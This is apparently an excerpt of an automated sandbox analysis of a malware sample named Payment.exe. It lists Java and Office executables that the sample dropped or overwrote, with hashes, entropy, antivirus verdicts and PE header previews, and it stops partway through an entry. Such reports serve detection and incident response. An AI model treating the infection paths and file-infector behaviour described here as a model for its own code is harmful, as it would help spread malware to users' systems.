SHA-512:	3F9D1B7BC1D20B724513447604C0E57DE67204DD4D3BC4032F6EB1A89717D8CCC1BFC8B62BCEED1E407CFAE6DBF97DEDED77095236E253B175166688AB5664DB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..........................@.......a..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.009600095246035
Encrypted:	false
SSDEEP:	12288:gRreV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:a6Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	F43485135336EA926199E99D442F4E74
SHA1:	CF2F5A6F5F74C51B6AF1498D45E64C8B16035683
SHA-256:	68E63790DC9110D137F3522931E0AF7B60856F983BFFA72018A0548BE2F62BC9
SHA-512:	0E003428BD3726B63C116FD5BFC08A4D8A47C9378B37A92E913C9AC21DEDB3EDCBA8E697A446F90B3223CB8ECE6E1651480C5E52575712154F4A0C3838A768E6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@...............................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1610752
Entropy (8bit):	4.193082602241774
Encrypted:	false
SSDEEP:	12288:MedP/DV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:HdP/pVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	BB8DD1E2CA47E0DACD8225AAD30A023A
SHA1:	DFDBD1355497C8F828D6267ACE5936DECC21A5A4
SHA-256:	983D36B9860E85D4F43DE83BB3601CF149F114C9071B9A23EEB0F95422CE1A00
SHA-512:	B65B35A7FA1DF5BC23AE4128C6F3E933F2F0785A6416C413BBDE460885AFABB4787D2A927B7B7E2FFC5E2DF36F635CE18BA3920B05EB60369FF1048E077060DA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@.............................................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.0096291506349
Encrypted:	false
SSDEEP:	12288:BA5GV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:eEVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	7A5E2833D6B9DD9D8C1D4A649522827C
SHA1:	E1B6826BC602399EAED11ABE70BE5C7382DF4610
SHA-256:	DFA8604CCC45B7BC583E6CF62B9CFDAB28CB4BFB759CDCB08543A58B5104BA86
SHA-512:	7375C7ADEE3F7911F378EE6647E6AA0A012A9EF64BE8EBF4B455835A0320BE892B938DED61151D599C989442240BDC5B77832D482C2677A4BD095E748E18DC96
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@.......P.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.009684347820805
Encrypted:	false
SSDEEP:	12288:q0luV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:tQVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	DA3D72230F341E4614D5822704077C13
SHA1:	D92E118709C72A8CC5452EBDD8ED2174574357DA
SHA-256:	853F6C4E221C63C1B5FABF9A3CCB9A4AC665420BEA1A7E9D3BFBC0B708C64E01
SHA-512:	634F70AC28D245B38A99A871B9CF5EB928A72363933172B947C35B6FF1B219587FCD4C274BEEA25C88A5EB7E64C78CBABC55AAD8AC4C4EEBFD670D3DC24461E3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@...............................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.009685039440904
Encrypted:	false
SSDEEP:	12288:HoluV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:IQVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	67038192D7B5393F2F89A2091A4EB1F0
SHA1:	EA0925A5649BF7BD929BE2BE459826C7853D635B
SHA-256:	46AD83FB3C6EA3BE5A8953224F42A72C0E2E8D30DE1F9B561C6C2B465FB7CB4B
SHA-512:	F56FF6BB1BA2291FD3CAFBCD8D07E88263C64F0751231B0BA7ECCEE2A42161D31AD8F94F9C338B1A940502F3BBC14934C92B16709B325FF61EFEC2974ED238DD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......0........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.0096617174381395
Encrypted:	false
SSDEEP:	12288:qhmOV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:yzVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	009464121A75DD09F7A1DE3C7E03E387
SHA1:	247D4B5B5A5D5120F816F7BF55B729074F410F4E
SHA-256:	BA6759ED1F7A5CD58276849EE2443FB56C90764951E6BC76DFD5AE5B8CEDC680
SHA-512:	C20B6FC487701D791E3EAB2B9E69B3E5D9D2532F8AC1A2FA02EC9BAA298472015D0DE4078E86316A3386D66DCE9B7C55FA2C0CFCD7956E5F2013149EB500C4A2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......\|........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.010412631456304
Encrypted:	false
SSDEEP:	12288:5EmCV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:m3Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	68AA2336E09D9C4335882B0766068D09
SHA1:	4A22C971318D7293F929A7D3C8ECFD21EDC4532E
SHA-256:	99DC9F4FCE4AAFFB58DEFFF7BFE856117BC4691523A8EBCA083AEF0A75416FF8
SHA-512:	0662ADDAD475E3EAD985873330BABCCAFC9F8D7FED382277FBF1AB79F1AB192F09BCF82E9B3E22912F264149938D8B9DC9A9F0431C71DFEF875974F9276DCBF7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......f ......................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.009647028861104
Encrypted:	false
SSDEEP:	12288:HW5GV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:2MVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	5E03894606D4912F076F194BE0E8E301
SHA1:	A340FBE15422EDB70B0B4334C31C31F7E5EF36A0
SHA-256:	E4FFF247F253B27ECA0078BC37F70F1CD897E4A4D760E97823EC04AAE1675AF5
SHA-512:	12B405BDF723DA21FDBDE5832EB490F2BB153CA59C303475D8C30460BC427A1096553918D1A20C06609786507A01C043D40C26DC860C43967ECC73B802C317F6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@..............................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.009670902021384
Encrypted:	false
SSDEEP:	12288:G3/uV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:4GVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	DD7D8741673678EC6AFFB0DE9F13DF53
SHA1:	DE4A2EFFDAC7B1629D7E3A8092DF05B3C10DC31B
SHA-256:	241DBA8E6E67AF076C6CD62B98DF9C3E7FA4B2CDA897AB469253DA9A53846ED7
SHA-512:	4381C7816877764FAF8E718F27EDD9EC58DBAA51C5AFAE0A4F331E83C18828329550CBFDFF85C7383161A3031D94EA5D591878DF83673957B419C7434C2BA3F7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......q........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.009591780607839
Encrypted:	false
SSDEEP:	12288:cTm+V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ezVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	DF418A6D4A867AF04F66DA44C7203906
SHA1:	54CFF6256126D6D5E84339A34EC824A8D2C1DF41
SHA-256:	D607EE7401FABC8A89283CC5A73BE28FD361AE71810417BE67EB250635E24114
SHA-512:	28C5ECA759C9BD51830D929338183646B3BFC456B837B56F680F7748A0A676D7F865C39F062008899F1C0DF3A36DE700730EAA13A8E5CB34FD0688E6C7B07866
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......m........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.009633319817884
Encrypted:	false
SSDEEP:	12288:HUSmV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:0PVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	F8C8DF15087F6D87618F14D1DB0FAF01
SHA1:	FB4D460EC47C900B716AC2D746A86D5F4F895A0B
SHA-256:	B89E2C28B82C80729D31F68DDB832A40F360D50C767A7FF150096C3B88915C97
SHA-512:	03946FBEE0FB27CBCFD4AD6F1A9772A82988FFE36D2188834491F4C54483BA97DD5DC374A8979ACCF05FE6F56978ABF7653CD830FD98BBE6C71BB1B23F06E074
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@......Q'.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.009690015818536
Encrypted:	false
SSDEEP:	12288:oj/uV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:WGVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	94F385BCFF17D74B5502DF7DA3691FE6
SHA1:	2EBE6A986F083D7AE57209DE93C2C2890F7B2A8B
SHA-256:	AE95C88B57D0DB60AA8BEB36192DC44BBAB32A311C1B08326FB646F7371188DB
SHA-512:	F4D3989708060E2435BFBCB151E32A2BCE3DF74657D19E011831CCF65CB17D7201A35C81583F72BB729410FE574FF03E809524B794F495940EB5567EAF96D8EA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@...............................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1571328
Entropy (8bit):	4.104867928070065
Encrypted:	false
SSDEEP:	12288:2tAV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:2tsVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	864D8FD17F60D79D6D799899D4E8B851
SHA1:	8B219BAA610F27A447DD0C9719A2E6221195943E
SHA-256:	F6C9EA4B0FE3B84FDEE4B2BA105417D43BBC50C991C1625D40115A102B0B3B76
SHA-512:	A5E9AE4908A05C48FF839CD9D313C8AD279CEEE556531B0D0803A634271219A42ECC7A98A31A83515B819FBBBAB2D1A41CD006D3D71078F76F7E65BAEB3B3CB5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..&).\^(.<&).\^-.3&).\^.=&).M-.?&).M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................\|...........u............@..........................0..................................................@....0..............................H...T...............................@...............P...P........................text...L{.......\|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1511424
Entropy (8bit):	4.009489263948273
Encrypted:	false
SSDEEP:	12288:1MQyV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:S1Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	5982142A63F490E6A17B6A256FCDEC84
SHA1:	09D7463BFB62325A785BF17ECDDECDAEFA70FD9F
SHA-256:	5936EDC4E3EE16E6CF31BB25E6719CDBD18F0A51230A4E182688D26B95EFEC59
SHA-512:	A7A27F7B37A241CA59300C84AAD7C221932E6A4A5DF4823DF679A6CF0C80D15B4574E091E3BBB37F4D259E04B63AD16DFC7CEDB12AEBADA709474A15C30D69BF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................@.......E.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc.......P.......0..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1667584
Entropy (8bit):	4.295853719150252
Encrypted:	false
SSDEEP:	24576:Li7lp3roAgVg9N9JMlDlfjRiVuVsWt5MJMs:GlZroAQgFIDRRAubt5M
MD5:	6C1A2DD43D0F68CDB5E8AE7A81DC7EC5
SHA1:	E871FF32EDD2EBAA6A742FE7D7FD40AF189D76C2
SHA-256:	2C48484006FFEC7B9BF47C500000D4C7F76F2BD46ABF4DFD9D31E1AA580F5D62
SHA-512:	F461304E9E014961F40A71404D047A4603A4FA88F9036430F293FD0FCA63AF5238285D421600C0662A79CB6C41AC339544FC731A84F9B0F64E7BAEA87D71C693
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@.....................................................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc..............................@...........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1637888
Entropy (8bit):	4.307785945903579
Encrypted:	false
SSDEEP:	12288:b5bfQhIV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:bNfQhkVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	24102019F92D5F0B45499420511B6451
SHA1:	4C430471EBFA7CDD82D3EFC50C30A9051E942E73
SHA-256:	B2BD55D49CD1F6CE6DF1C72DC83DB1769F48EBB856C0F8424116C19ED25F3BD1
SHA-512:	B4DC07733D55864D3F6918FA1A93A12DB48AE86EC5555E7FA526D759612508218E82323F2BCC44669E33FC7E20729C5E607EC6B4B3AAB02773BC2545754902C1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................\|.......\|.......\|.......\|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@..........................@......~Z......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc.......@......................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1656320
Entropy (8bit):	4.3332189432484265
Encrypted:	false
SSDEEP:	12288:hNmt0LDILi2T1V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:0LiKVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	BD5746AFDEA2797530069BB0CD779224
SHA1:	AE46A54E00BC763E9384F9CF883181C7BD2F3CA6
SHA-256:	20BBA6640A732C4F1E0EA883500F990D80D03125F9D82785E697ECF9C4B795E9
SHA-512:	6AE9B1F5BADAF50E1F9A05A82DD518F404D13D2792205AF7A2DCCC0F0BBF599A384BE60E04F3844EEF5538451442615AA5384100D73542AC143C1430454F577B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1656320
Entropy (8bit):	4.333228313715965
Encrypted:	false
SSDEEP:	12288:hNmt0LDILi2T1V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:0LiKVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	04F595D388A8C7479C272CBB00D963AB
SHA1:	374D439415BB0D2B286D7ED2B808A87F6832B52C
SHA-256:	DA392FCB56B39344AFC620585C70E7B8CEDBB061ECE7532B5C93C5384442C0F5
SHA-512:	D1E4E5AA200C14C94795542C6AFDDBA78F8BBF5B9FAA288B549E4E2DDB2CDFC3A4F725006FD54982C794735F40DAFC7C8BF50FF519D9DA7D721096F5628D979A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................P........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1712128
Entropy (8bit):	4.309600684434423
Encrypted:	false
SSDEEP:	12288:SjuozyMGNUbTAV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:6f6Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	2CA7CDC615CD5DFDA7DCF5E692D7269E
SHA1:	B210692285C8998E023325F2FCAA771D17CACEB3
SHA-256:	496C06B6A72D754E8B39D8D0030655D93DA4173F884E209D5F77502CC4F38D2D
SHA-512:	8BB015893B8364E2AF1CFC08B6340634C88CDC09E1B422D1F38F5A318CC9F298C887EDCFD833995AC701C31F3BE946808933C684ECEA54F20C58A8016D1539D4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.............................@............ .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1864704
Entropy (8bit):	4.68789351425052
Encrypted:	false
SSDEEP:	24576:AbUO42Y/EBVg9N9JMlDlfjRiVuVsWt5MJMs:AHLgFIDRRAubt5M
MD5:	74D19F50735B5208A8F6050DE69ED1A1
SHA1:	E0ECAF795BBE38124A853D597BAE7B660145F5D5
SHA-256:	387DF7F756200749F2034BD5093A65362A5A927AF730D6C62FCEBA1EF08B21A1
SHA-512:	49CFCAAAD251278FED7F33E89690C1BD27AADE2EB2BB27D8DDAF42E356F712F318095CDACC38D6B407D64959DE5AEBE70907E0EB3CFB673428420CE0EB97741D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...\|...............@....@.................................>............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc... ...........d..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52712960
Entropy (8bit):	7.961826193560219
Encrypted:	false
SSDEEP:
MD5:	FAA3A2F00AFCF2060350C22A0A608208
SHA1:	520F4905C93A2E1CBD52883064FDD2523FAB0128
SHA-256:	A5DB380CD7B22CCAB17EED680CAD3D8112411D5288E17F29D12EED2BDD7A7578
SHA-512:	9325B033B368AE2FEC77CCB44525D1095E87380E6F8ACB1107FFBD2102E7B354524ED16ECC5CB0052A95A55487FBE692031F53E55B145848DFBADE9E32045C8B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993536
Entropy (8bit):	6.810469649250409
Encrypted:	false
